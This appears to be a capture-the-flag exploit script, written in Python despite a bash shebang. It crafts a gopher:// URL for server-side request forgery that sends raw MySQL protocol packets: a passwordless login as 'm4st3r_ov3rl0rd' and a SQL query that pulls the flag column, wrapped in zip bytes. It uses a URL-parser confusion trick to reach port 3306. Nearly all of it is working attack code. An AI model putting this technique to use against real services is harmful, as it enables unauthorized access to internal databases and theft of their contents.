#!/bin/bash

import struct 
import zip_tools
from binascii import hexlify


# make a 100 dummy character string
# we will rpad flag to 100 characters (this is needed since actual flag length is unknown, you
# could just bruteforce it tohugh i guess...)
flag_dummy = b"B"*100

payload = zip_tools.create_zip(b"gimme_flag", flag_dummy)
# print(''.join(map(chr,payload)))
# exit()

prefix = bytes(payload.split(flag_dummy)[0])
suffix = bytes(payload.split(flag_dummy)[1])


sql_cmd = b"select concat(cast(0x" + hexlify(prefix) + b" as binary), rpad(flag, 100, 'A'), cast(0x" + hexlify(suffix) + b" as binary)) from flag.flag-- -"

auth = bytearray([
    0x48, 0x0, 0x0,     # length
    0x1,                # seqid
    0x85, 0xa6, 0x3f, 0x20, 0, 0, 0, 0x1, 0x21, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 
    0, 0, 0, 0, 0
] + list(b'm4st3r_ov3rl0rd') + [      # mysql user
    0, 0,               # pass length & pass
] + list(b'mysql_native_password') + [
    0, 0,
])


def make_cmd(cmd):
    length = struct.pack("<I", len(cmd) + 2)[:3]

    return length + bytearray([
        0x0,         # seqid
        0x3,   # select query
    ]) + cmd
    
def encode(s):
    return ''.join(map(lambda x: "%{:02x}".format(x), list(s)))


print((b"gopher://foo@[abcbcb.cf]@yolo.com:3306/A" + bytes(encode(auth + make_cmd(sql_cmd) + b"FOOOOOOOOOOOOBAR"),"utf-8")).decode())




